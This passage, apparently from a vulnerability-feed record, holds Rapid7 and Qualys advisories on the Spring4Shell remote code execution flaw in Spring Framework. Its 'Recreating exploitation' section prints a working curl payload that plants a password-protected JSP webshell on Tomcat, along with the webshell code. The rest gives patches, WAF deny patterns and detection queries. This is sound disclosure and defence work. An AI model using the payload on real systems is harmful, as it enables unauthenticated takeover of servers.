commit](<https://github.com/helloexp/0day/tree/14757a536fcedc8f4436fed6efb4e0846fc11784/22-Spring%20Core>) that contained proof-of-concept (PoC) exploit code. The exploit code targeted a zero-day vulnerability in the Spring Core module of the Spring Framework. Spring is maintained by [Spring.io](<https://spring.io/>) (a subsidiary of VMWare) and is used by many Java-based enterprise software frameworks. 
The vulnerability in the leaked proof of concept, which appeared to allow unauthenticated attackers to execute code on target systems, was quickly [deleted](<https://webcache.googleusercontent.com/search?q=cache:fMlVaoPj2YsJ:https://github.com/helloexp+&cd=1&hl=en&ct=clnk&gl=us>).\n\n\n\nA lot of confusion followed for several reasons: First, the vulnerability (and proof of concept) isn\u2019t exploitable with out-of-the-box installations of Spring Framework. The application has to use specific functionality, which we explain below. Second, a completely different unauthenticated RCE vulnerability was [published](<https://spring.io/blog/2022/03/29/cve-report-published-for-spring-cloud-function>) March 29, 2022 for Spring Cloud, which led some in the community to conflate the two unrelated vulnerabilities.\n\nRapid7\u2019s research team can confirm the zero-day vulnerability is real and provides unauthenticated remote code execution. Proof-of-concept exploits exist, but it\u2019s currently unclear which real-world applications use the vulnerable functionality. As of March 31, Spring has also [confirmed the vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it. 
It affects Spring MVC and Spring WebFlux applications running on JDK 9+.\n\n## Known risk\n\nThe following conditions map to known risk so far:\n\n * Any components using Spring Framework versions before 5.2.20, 5.3.18 **AND** JDK version 9 or higher **are considered [potentially vulnerable](<https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751>)**;\n * Any components that meet the above conditions **AND** are using @RequestMapping annotation and Plain Old Java Object (POJO) parameters **are considered actually vulnerable** and are at some risk of being exploited;\n * Any components that meet the above conditions **AND** are running Tomcat **are _currently_ most at risk of being exploited** (due to [readily available exploit code](<https://github.com/craig/SpringCore0day>) that is known to work against Tomcat-based apps).\n\n## Recreating exploitation\n\nThe vulnerability appears to affect functions that use the [@RequestMapping](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/web/bind/annotation/RequestMapping.html>) annotation and POJO (Plain Old Java Object) parameters. Here is an example we hacked into a [Springframework MVC demonstration](<https://github.com/RameshMF/spring-mvc-tutorial/tree/master/springmvc5-helloworld-exmaple>):\n \n \n package net.javaguides.springmvc.helloworld.controller;\n \n import org.springframework.stereotype.Controller;\n import org.springframework.web.bind.annotation.InitBinder;\n import org.springframework.web.bind.annotation.RequestMapping;\n \n import net.javaguides.springmvc.helloworld.model.HelloWorld;\n \n /**\n * @author Ramesh Fadatare\n */\n @Controller\n public class HelloWorldController {\n \n \t@RequestMapping(\"/rapid7\")\n \tpublic void vulnerable(HelloWorld model) {\n \t}\n }\n \n\nHere we have a controller (`HelloWorldController`) that, when loaded into Tomcat, will handle HTTP requests to `http://name/appname/rapid7`. 
The function that handles the request is called `vulnerable` and has a POJO parameter `HelloWorld`. Here, `HelloWorld` is stripped down but POJO can be quite complicated if need be:\n \n \n package net.javaguides.springmvc.helloworld.model;\n \n public class HelloWorld {\n \tprivate String message;\n }\n \n\nAnd that\u2019s it. That\u2019s the entire exploitable condition, from at least Spring Framework versions 4.3.0 through 5.3.15. (We have not explored further back than 4.3.0.)\n\nIf we compile the project and host it on Tomcat, we can then exploit it with the following `curl` command. Note the following uses the exact same payload used by the original proof of concept created by the researcher (more on the payload later):\n \n \n curl -v -d \"class.module.classLoader.resources.context.parent.pipeline\n .first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%\n 22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRunt\n ime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%\n 20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20\n while((a%3Din.read(b))3D-1)%7B%20out.println(new%20String(b))%3B%20%7\n D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context\n .parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources\n .context.parent.pipeline.first.directory=webapps/ROOT&class.module.cl\n assLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&cl\n ass.module.classLoader.resources.context.parent.pipeline.first.fileDat\n eFormat=\" http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1-\n SNAPSHOT/rapid7\n \n\nThis payload drops a password protected webshell in the Tomcat ROOT directory called `tomcatwar.jsp`, and it looks like this:\n \n \n - if(\"j\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in\n = -.getRuntime().exec(request.getParameter(\"cmd\")).getInputStream();\n int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))3D-1){ out.\n 
println(new String(b)); } } -\n \n\nAttackers can then invoke commands. Here is an example of executing `whoami` to get `albinolobster`:\n\n\n\nThe Java version does appear to matter. Testing on OpenJDK 1.8.0_312 fails, but OpenJDK 11.0.14.1 works.\n\n## About the payload\n\nThe payload we\u2019ve used is specific to Tomcat servers. It uses a technique that was popular as far back as 2014 and that alters the **Tomcat** server\u2019s logging properties via ClassLoader. The payload simply redirects the logging logic to the `ROOT` directory and drops the file + payload. A good technical write-up can be found [here](<https://hacksum.net/2014/04/28/cve-2014-0094-apache-struts-security-bypass-vulnerability/>).\n\nThis is just one possible payload and will not be the only one. We\u2019re certain that malicious class loading payloads will appear quickly.\n\n## Mitigation guidance\n\nAs of March 31, 2022, CVE-2022-22965 has been assigned and Spring Framework versions 5.3.18 and 5.2.20 have been released to address it. Spring Framework users should update to the fixed versions, starting with internet-exposed applications that meet criteria for vulnerability (see `Known Risk`). As organizations build an inventory of affected applications, they should also look to gain visibility into process execution and application logs to monitor for anomalous activity.\n\nFurther information on the vulnerability and ongoing guidance are being provided in [Spring\u2019s blog here](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>). The Spring [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>) for DataBinder explicitly notes that:\n\n\u2026there are potential security implications in failing to set an array of allowed fields. 
In the case of HTTP form POST data for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\n\nTherefore, one line of defense would be to modify source code of custom Spring applications to ensure those field guardrails are in place. Organizations that use third-party applications susceptible to this newly discovered weakness cannot take advantage of this approach.\n\nIf your organization has a web application firewall (WAF) available, profiling any affected Spring-based applications to see what strings can be used in WAF detection rulesets would help prevent malicious attempts to exploit this weakness.\n\nIf an organization is unable to patch or use the above mitigations, one failsafe option is to model processes executions on systems that run these Spring-based applications and then monitor for anomalous, \u201cpost-exploitation\u201d attempts. These should be turned into alerts and acted upon immediately via incident responders and security automation. One issue with this approach is the potential for false alarms if the modeling was not comprehensive enough.\n\n## Vulnerability disambiguation\n\nThere has been significant confusion about this zero-day vulnerability because of an unrelated vulnerability in another Spring project that was published March 29, 2022. That vulnerability, [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>), affects Spring Cloud Function, which is not in Spring Framework. Spring released version 3.1.7 & 3.2.3 to address CVE-2022-22963 on March 29.\n\nFurther, yet another vulnerability [CVE-2022-22950](<https://tanzu.vmware.com/security/cve-2022-22950>) was assigned on March 28. A fix was released on the same day. 
To keep things confusing, this medium severity vulnerability (which can cause a DoS condition) DOES affect Spring Framework versions 5.3.0 - 5.3.16.\n\n## Updates\n\n### March 30, 2020 - 9PM EDT\n\nThe situation continues to evolve but Spring.IO has yet to confirm the vulnerability. That said, we are actively testing exploit techniques and combinations. In the interim, for organizations that have large deployments of the core Spring Framework or use it for business-critical applications, we have validated the following two mitigations. Rapid7 Labs has not yet seen evidence of exploitation in the wild.\n\n#### WAF Rules\n\nAs referenced previously and reported elsewhere, for organizations that have WAF technology, string filters offer an effective deterrent: `class.*`, `Class.*`, `*.class.*`, and `*.Class.*`. These should be tested prior to production deployment but are effective mitigation techniques.\n\n#### Spring Framework Controller advice\n\nOur friends at [Praetorian](<https://www.praetorian.com/blog/spring-core-jdk9-rce/>) have suggested a heavy but validated mitigation strategy by using the Spring Framework to disallow certain patterns. In this case, that means any invocation containing \u201cclass\u201d. Praetorian\u2019s example is provided below. 
The heavy lift requires recompiling code, but for those with few options it does prevent exploitation.\n\nimport org.springframework.core.Ordered; \nimport org.springframework.core.annotation.Order; \nimport org.springframework.web.bind.WebDataBinder; \nimport org.springframework.web.bind.annotation.ControllerAdvice; \nimport org.springframework.web.bind.annotation.InitBinder;\n\n@ControllerAdvice \n@Order(10000) \npublic class BinderControllerAdvice { \n@InitBinder \npublic void setAllowedFields(WebDataBinder dataBinder) { \nString[] denylist = new String[]{"class.*", "Class.*", "*.class.*", "*.Class.*"}; \ndataBinder.setDisallowedFields(denylist); \n} \n}\n\n### March 31, 2022 - 7 AM EDT\n\nAs of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and is working on an emergency release. The vulnerability affects SpringMVC and Spring WebFlux applications running on JDK 9+.\n\nOur next update will be at noon EDT on March 31, 2022.\n\n### March 31, 2022 - 10 AM EDT\n\nCVE-2022-22965 has been assigned to this vulnerability. As of March 31, 2022, Spring has [confirmed the zero-day vulnerability](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>) and has released Spring Framework versions 5.3.18 and 5.2.20 to address it.\n\n### March 31, 2022 - 12 PM EDT\n\nWe have added a `Known Risk` section to the blog to help readers understand the conditions required for applications to be potentially or known vulnerable.\n\nOur team is testing ways of detecting the vulnerability generically and will update on VM and appsec coverage feasibility by 4 PM EDT today (March 31, 2022).\n\n### March 31, 2022 - 4 PM EDT\n\ntCell will alert customers if any [vulnerable packages](<https://docs.rapid7.com/tcell/packages-and-vulnerabilities>) (such as CVE-2022-22965) are loaded by the application. The tCell team is also working on adding a specific detection for Spring4Shell. 
An InsightAppSec attack module is under development and will be released to all application security customers (ETA April 1, 2022). We will publish additional guidance and detail for application security customers tomorrow, on April 1.\n\nInsightVM customers utilizing Container Security can now assess containers that have been built with a vulnerable version of Spring. At this time we are not able to identify vulnerable JAR files embedded with WAR files in all cases, which we are working on improving. Our team is continuing to test ways of detecting the vulnerability and will provide another update on the feasibility of VM coverage at 9 PM EDT.\n\n### March 31, 2022 - 9 PM EDT\n\nMultiple [reports](<https://twitter.com/bad_packets/status/1509603994166956049>) have indicated that attackers are scanning the internet for applications vulnerable to Spring4Shell. There are several reports of exploitation in the wild. SANS Internet Storm Center [confirmed exploitation in the wild](<https://isc.sans.edu/forums/diary/Spring+Vulnerability+Update+Exploitation+Attempts+CVE202222965/28504/>) earlier today.\n\nOur team is working on both authenticated and remote vulnerability checks for InsightVM and Nexpose customers. We will provide more specific ETAs in our next update at 11 AM EDT on April 1.\n\n### April 1, 2022 - 11 AM EDT\n\nOur team is continuing to test ways of detecting CVE-2022-22965 and expects to have an authenticated check for Unix-like systems available to InsightVM and Nexpose customers in today\u2019s (April 1) content release. We are also continuing to research remote check capabilities and will be working on adding InsightAgent support in the coming days. Our next update will be at 3 PM EDT on April 1, 2022.\n\nFor information and updates about Rapid7\u2019s internal response to Spring4Shell, please see our post [here](<https://www.rapid7.com/blog/post/2022/04/01/update-on-spring4shells-impact-on-rapid7-solutions-and-systems/>). 
At this time, we have not detected any successful exploit attempts in our systems or solutions.\n\n### April 1, 2022 - 3 PM EDT\n\nOur team intends to include an authenticated check for InsightVM and Nexpose customers in a content-only release this evening (April 1). We will update this blog at or before 10 PM EDT with the status of that release.\n\nAs of today, a new block rule is available to tCell customers (**Spring RCE block rule**) that can be enabled by navigating to Policies --> AppFw --> Blocking Rules. Check the box next to the Spring RCE block rule to enable, and click deploy.\n\n### April 1 - 7:30 PM EDT\n\nInsightVM and Nexpose customers can now scan their environments for Spring4Shell with authenticated and remote checks for CVE-2022-22965. The authenticated check (vulnerability ID `spring-cve-2022-22965`) will run on Unix-like systems and report on vulnerable versions of the Spring Framework found within WAR files. **Please note:** The `unzip` utility is required to be installed on systems being scanned. The authenticated check is available immediately for Nexpose and InsightVM Scan Engines. We are also targeting an Insight Agent release next week to add support for the authenticated Unix check.\n\nThe remote check (vulnerability ID `spring-cve-2022-22965-remote-http`) triggers against any discovered HTTP(S) services and attempts to send a payload to common Spring-based web application paths in order to trigger an HTTP 500 response, which indicates a higher probability that the system is exploitable.\n\nOur team is actively working on a Windows authenticated check as well as improvements to the authenticated Unix and remote checks. 
More information on how to scan for Spring4Shell with InsightVM and Nexpose is [available here](<https://docs.rapid7.com/insightvm/spring4shell/>).\n\nInsightAppSec customers can now scan for Spring4Shell with the updated Remote Code Execution (RCE) [attack module](<https://docs.rapid7.com/release-notes/insightappsec/20220401/>). A [blog is available](<https://www.rapid7.com/blog/post/2022/04/01/securing-your-applications-against-spring4shell-cve-2022-22965/>) on securing your applications against Spring4Shell.\n\n### April 4 - 2 PM EDT\n\nApplication Security customers with on-prem scan engines now have access to the updated Remote Code Execution (RCE) module which specifically tests for Spring4Shell.\n\nInsightCloudSec supports detection and remediation of Spring4Shell (CVE-2022-22965) in multiple ways. The new container vulnerability assessment capabilities in InsightCloudSec allow users to detect vulnerable versions of Spring Java libraries in containerized environments. For customers who do not have container vulnerability assessment enabled, our integration with Amazon Web Services (AWS) Inspector 2.0 allows users to detect the Spring4Shell vulnerability in their AWS environments.\n\nOur next update will be at 6 PM EDT.\n\n### April 4 - 6 PM EDT\n\nOur team is continuing to actively work on a Windows authenticated check as well as accuracy improvements to both the authenticated Unix and remote checks.\n\nOur next update will be at or before 6pm EDT tomorrow (April 5).\n\n### April 5 - 6 PM EDT\n\nA product release of InsightVM (version 6.6.135) is scheduled for tomorrow, April 6, 2022. It will include authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. 
A vulnerability check making use of this fingerprinting will be released later this week.\n\nWe have also received some reports of false positive results from the remote check for CVE-2022-22965; a fix for this is expected in tomorrow\u2019s (April 6) **content release**. This week\u2019s Insight Agent release, expected to be generally available on April 7, will also add support for the authenticated Unix check for CVE-2022-22965.\n\nThe Registry Sync App and Container Image Scanner have been updated to support assessing new container images to detect Spring4Shell in container environments. Both registry-sync-app and container-image-scanner can now assess new Spring Bean packages versions 5.0.0 and later that are embedded in WAR files.\n\n### April 6 - 6 PM EDT\n\nToday\u2019s product release of InsightVM (version 6.6.135) includes authenticated Windows fingerprinting support for Spring Framework when \u201cEnable Windows File System Search\u201d is configured in the scan template. A vulnerability check making use of this fingerprinting will be released later this week.\n\nToday\u2019s content release, available as of 6pm EDT, contains a fix for false positives some customers were experiencing with our remote (HTTP-based) check when scanning Microsoft IIS servers.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), expected to be generally available by Friday April 8, will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 7 - 5:30 PM EDT\n\nToday\u2019s content release for InsightVM and Nexpose (available as of 4:30pm EDT) contains a new authenticated vulnerability check for Spring Framework on Windows systems. The April 6 product release (version 6.6.135) is required for this check. 
Note that this functionality requires the \u201cEnable Windows File System Search\u201d option to be set in the scan template.\n\nThis week\u2019s Insight Agent release (version 3.1.4.48), which will be generally available tomorrow (April 8), will add data collection support for the authenticated check for CVE-2022-22965 on macOS and Linux. A subsequent Insight Agent release will include support for the authenticated Windows check.\n\n### April 8 - 3 PM EDT\n\nThe Insight Agent release (version 3.1.4.48) to add data collection support for Spring4Shell on macOS and Linux is now expected to be available starting the week of April 11, 2022.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T22:33:54", "type": "rapid7blog", "title": "Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2021-44228", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T22:33:54", "id": 
"RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "href": "https://blog.rapid7.com/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-04-08T16:57:59", "description": "_This page last updated: April 7th_\n\nA new zero-day Remote Code Execution (RCE) vulnerability, \u201cSpring4Shell\u201d or \u201cSpringShell\u201d was disclosed in the Spring framework. An unauthorized attacker can exploit this vulnerability to remotely execute arbitrary code on the target device. \n\n### What is Spring Framework? \n\nSpring-core is a prevalent framework widely used in Java applications that allows software developers to develop Java applications with enterprise-level components effortlessly. \n\n### Which versions are vulnerable? \n\nThe vulnerability requires JDK version 9 or later to be running. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions are vulnerable. It allows remote attackers to plant a web shell when running Spring framework apps on top of JRE 9. It is caused by unsafe deserialization of given arguments that a simple HTTP POST request can trigger to allow full remote access. \n\n### How can this be exploited? \n\nThe exploitation of this vulnerability relies on an endpoint with DataBinder enabled, which decodes data from the request body automatically. This property could enable an attacker to leverage Spring4Shell against a vulnerable application. In fact, the Spring framework class DataBinder warns about this in its [documentation](<https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/validation/DataBinder.html>): \n\n\u201cNote that there are potential security implications in failing to set an array of allowed fields. 
In the case of HTTP form POST data, for example, malicious clients can attempt to subvert an application by supplying values for fields or properties that do not exist on the form. In some cases, this could lead to illegal data being set on command objects or their nested objects. For this reason, it is highly recommended to specify the allowedFields property on the DataBinder.\u201d \n\n### What are the prerequisites to exploit this vulnerability? \n\n * JDK 9 or higher \n * Apache Tomcat as the Servlet container \n * Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) \n * spring-webmvc or spring-webflux dependency \n * Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions \n\n### Is there a patch available for Spring4Shell? \n\nSpring Framework 5.3.18 and 5.2.20, which contain the fixes, have been released. If you\u2019re able to upgrade to Spring Framework **5.3.18** or **5.2.20**, no workarounds are necessary. \n\nIf you cannot update to the latest Spring Framework version, upgrading to Apache Tomcat **10.0.20**, **9.0.62**, or **8.5.78** provides adequate protection but does not solve the vulnerability completely. \n\nIn addition, there are multiple working proof-of-concept (PoC) exploits available for Spring4Shell. We strongly recommend that organizations deploy these mitigations or use a third-party firewall for defense. \n\n### Qualys Coverage \n\nQualys Research Team has released the following authenticated QIDs to address this vulnerability for now. These QIDs will be available starting with vulnsigs version VULNSIGS-2.5.438-3 and in Cloud Agent manifest version LX_MANIFEST-2.5.438.3-2. 
\n\n**QID**| **Title**| **Version**| **Available for** \n---|---|---|--- \n376506| Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n45525| Spring core or Spring beans jar detected| VULNSIGS-2.5.438-3| Scanner/Cloud Agent \n150494| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (CVE-2022-22963)| VULNSIGS-2.5.440-3| Web Application Security \n376508| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Authenticated)| VULNSIGS-2.5.440-6/ lx_manifest-2.5.440.6-5| Scanner/Cloud Agent \n730418| Spring Cloud Function Remote Code Execution (RCE) Vulnerability (Unauthenticated Check)| VULNSIGS-2.5.440-6| Scanner \n150495 | Spring Core Remote Code Execution (RCE) Vulnerability CVE-2022-22965 (Spring4Shell) | VULNSIGS-2.5.443-3 | Web Application Security \n48209 | Spring Framework and Spring Boot JARs Spring Cloud JARs Detected Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376514 | Spring Framework Remote Code Execution (RCE) Vulnerability (Spring4Shell) Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n376520 | Spring Cloud Function Remote Code Execution (RCE) Vulnerability Scan Utility | VULNSIGS-2.5.444-2/manifest 2.5.444.2-1 | Scanner/Cloud Agent \n730416 | Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell) (Unauthenticated Check) | VULNSIGS-2.5.445-3 | Scanner \n \n### Discover Your Attack Surface with up-to-date CyberSecurity Asset Management \n\nAs a first step, Qualys recommends assessing all assets in your environment to map the entire attack surface of your organization. \n\n#### Scoping Potential Attack Surface \n\nQualys Cybersecurity Asset Management (CSAM) continuously inventories all your assets and software. Use CSAM to find assets with Apache Tomcat running on JDK 9 or higher. 
\n \n \n QQL: _software:(name:tomcat) and software:(name:\"jdk\" and version>=9)___ \n\n\n\n#### Finding Vulnerable Spring Components and Versions \n\nQualys CSAM can further help you narrow down the scope by adding Spring Framework to the search criteria, and specifically match on vulnerable components and versions. This can be used to find assets that have not yet been scanned with VMDR for the Spring4Shell QIDs yet. \n \n \n QQL: software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Monitoring Upgrades and Mitigations \n\nUpgrading to Spring Framework 5.3.18+ or 5.2.20+ addresses the root cause and prevents other attack vectors, and it adds protection for other CVEs. Qualys CSAM allows customers to list all Spring Framework versions and verify upgrades. \n\nHowever, some may be in a position where upgrading is not possible to do quickly. VMware provided the mitigation alternative to upgrade Apache Tomcat to versions 10.0.20, 9.0.62, or 8.5.78, which close the attack vector on Tomcat\u2019s side. Qualys CSAM allows you to check for the presence or absence of these Tomcat updates. \n\nQQL for assets with mitigated Tomcat: \n \n \n software:(name:tomcat and update:[`10.0.20`,`9.0.62`,`8.5.78`]) \n\nQQL for assets excluding mitigated Tomcat: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) and software:(name:\"Spring\" and version:\"vulnerable\") \n\n#### Context Is Critical to Prioritize and Remediate \n\nSecurity teams need to understand the distribution of affected assets from different perspectives, such as internet-exposed, production versus non-production, and which of these assets support business-critical services. 
Qualys CSAM integrates with additional sources, to import asset and business context, that helps customers further understand their impact, prioritize assets based on business criticality, and work with corresponding asset owners and support groups to take remedial actions. \n\nQQL for assets with Tomcat exposed to the internet and visible in Shodan: \n \n \n software:(name:tomcat) and software:(name:\"jdk\" and version>=9) and tags.name:shodan \n\n\n\n### Detect the Vulnerability with Qualys WAS\n\nSecond, protect your public Internet-facing apps, as they are the most exposed to attack and therefore high priority. \n\nThe Qualys WAS Research Team has developed two signatures for detecting vulnerable versions of the Spring Framework. \n\n * QID 150494 (released April 1st) will report vulnerable versions of Spring Cloud Applications (CVE-2022-22963). \n * QID 150495 (released on 6th) will report vulnerable versions of Spring Core Applications (CVE-2022-22965). \n\nThese QIDs are automatically added to the Core Detection Scope. If you are scanning web applications with the Initial WAS Option Profile then there is no further action necessary. Your scans will automatically test for vulnerable versions of the Spring Framework and report any vulnerable instances found. \n\nIf you are using a custom Option Profile for your scans, please ensure you are either using the Core Detection Scope in your Option Profile or adding the above QIDs to any static or dynamic Custom Search Lists. \n\n\n\nThese QIDs collectively use a combination of Out-of-Band and non-Out-of-Band tests for accurate detection. \n\n\n\nThe WAS Research Team is investigating other safe methods for detecting this vulnerability to compensate for potential False Negatives or False Positive cases. In the meantime, it is recommended to use WAS in coordination with other Qualys modules for a more comprehensive methodology for detecting the Spring4Shell vulnerability. 
\n\nIf your application is vulnerable to Spring4Shell, it is recommended that you immediately follow the steps outlined in the \u201cIs there a patch available for Spring4Shell?\u201d section of this blog. \n\n### Detect Spring4Shell Vulnerability Using Qualys VMDR\n\nNext, it\u2019s time to find Spring4Shell wherever it is hiding in your environment and prioritize your response. \n\nQualys VMDR customers should ensure all their assets are scanned against the above QIDs. As this vulnerability only targets the Spring Framework when deployed with JDK>9 and Tomcat, customers must at least ensure assets with Tomcat and JDK>9 are scanned. The following QQL can be used to find such assets: \n \n \n software:(name:tomcat and not update:[`10.0.20`,`9.0.62`,`8.5.78`]) and software:(name:\"jdk\" and version>=9) \n\n\n\nOnce assets have been scanned for the above QIDs, customers can use the following QQL to search for the Spring4Shell vulnerability in their environment: \n\nvulnerabilities.vulnerability.qid:376506 \n\n\n\n### Track Spring4Shell Progress with Unified Dashboard\n\nThe Unified Dashboard enables you to track this vulnerability and its impacted hosts, their status, and overall management in real-time. To help you quickly find vulnerable hosts and software, a new unified dashboard is created on the Qualys platform. This dashboard has extremely useful widgets listing all the vulnerable hosts, applications with vulnerable versions of Spring, and most importantly all the vulnerable hosts visible on the Internet. It provides visibility to compliance configurations and software on your \u2018External Attack Surface\u2019 visible on [Shodan](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/qualys-integrates-with-shodan-to-help-map-the-external-attack-surface>) being the low-hanging opportunities for attackers. These widgets also list workloads hosted on shared cloud infrastructure and that have public IP addresses. 
To use this capability, download and import this Global Dashboard. \n\n[[Download and import \u201cSpring4Shell\u201d Global Dashboard](<https://2jws2s3y97dy39441y2lgm98-wpengine.netdna-ssl.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard.zip>)](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)[Download](<https://blog.qualys.com/wp-content/uploads/2022/04/QLYS-Spring4Shell-Dashboard-2.zip>)\n\n\n\n### Detect Spring4Shell Vulnerabilities in Running Containers & Images\n\nIf you run Apache Tomcat in containers, then it is critical that you check for Spring4Shell vulnerabilities, given the high severity of this potential exploit. Qualys Container Security offers multiple methods to help you detect Spring4Shell vulnerabilities in your container environment. The Container Security sensor checks both running containers and container images for the following vulnerabilities: \n\n * QID 376506 (CVE-2022-22965) \n * QID 376508 (CVE-2022-22963) \n\nTo detect vulnerabilities in running containers, you must deploy the Container Security sensor in \u201cGeneral\u201d mode on the hosts running the containers. You can view the containers impacted by these vulnerabilities by navigating to the \u201cContainer Security\u201d application, then selecting the \u201cAssets-> Container\u201d tab, and using the following QQL query: \n\nvulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the vulnerable container and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nIn addition to scanning running containers, Qualys recommends that you scan container images for Spring4Shell vulnerabilities. Catching and remediating Spring4Shell vulnerabilities in container images will eliminate exposure to the vulnerabilities when the image is instantiated as a container. 
\n\nTo view all the impacted images, navigate to the Qualys Container Security app, then select the \u201cAssets -> Images\u201d tab, and use the following QQL query: \n \n \n vulnerabilities.qid:376506 or vulnerabilities.qid:376508 \n\n\n\nTo view details of the vulnerability, you can click on the image and navigate to the \u201cVulnerabilities\u201d tab as shown in the screenshot below: \n\n\n\nQualys Container Security offers a comprehensive solution for detecting vulnerabilities, including Spring4Shell, across the entire lifecycle of the container from build time to runtime. \n\n### Remediate Spring4Shell Using Qualys Patch Management\n\nThe recommended way to patch this vulnerability is by updating to Spring Framework 5.3.18 and 5.2.20 or greater. Customers can use Patch Management\u2019s install software action to download and script the upgrade. Note that customers can create a patch job that only includes the install/script action, in such case there is no need to add patches to the job. Alternatively, if upgrading the Spring Framework is not possible, customers can use Qualys patch management to patch Tomcat to versions: 10.0.20, 9.0.62, or 8.5.78. Tomcat patches are supported out-of-the-box and require no special configuration. \n\n\n\n### Detect Spring4Shell Exploitation Attempts with Qualys XDR\n\nAn important last step in confronting Spring4Shell is to ensure that your organization has not already been targeted by attacks that exploit this vulnerability. \n\nThe Qualys Threat Intelligence team has released the following XDR correlation rules for detecting Remote Code Execution exploitation attempts. These rules are available today via your TAM for quick import and implementation and will be delivered as part of a rule pack in a future XDR release. 
\n\nT1190 - [Palo Alto Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Check Point IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Fortinet Firewall] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\nT1190 - [Trend Micro TippingPoint IPS] Spring4Shell RCE Vulnerability Exploitation Detected (CVE-2022-22965) \n\n### FAQ: \n\n#### Is this vulnerability related to CVE-2022-22963? \n\nThere is some confusion about this zero-day vulnerability due to another unrelated Spring vulnerability (CVE-2022-22963) published on March 29, 2022. This vulnerability, CVE-2022-22963, impacts Spring Cloud Function, which is not in Spring Framework. \n\nQIDs 376508 and 730418 are available to address this CVE. \n\n#### What is the detection logic for QID 376506: Spring Core Remote Code Execution (RCE) Vulnerability (Spring4Shell)? \n\nQID 376506 is an authenticated check currently supported on Linux and Windows Operating Systems. \n\nOn Linux systems, detection checks if system has java 9 or later versions and executes \u2018locate\u2019 and \u2018 ls -l /proc/*/fd \u2018 to checks if one of the \u2018 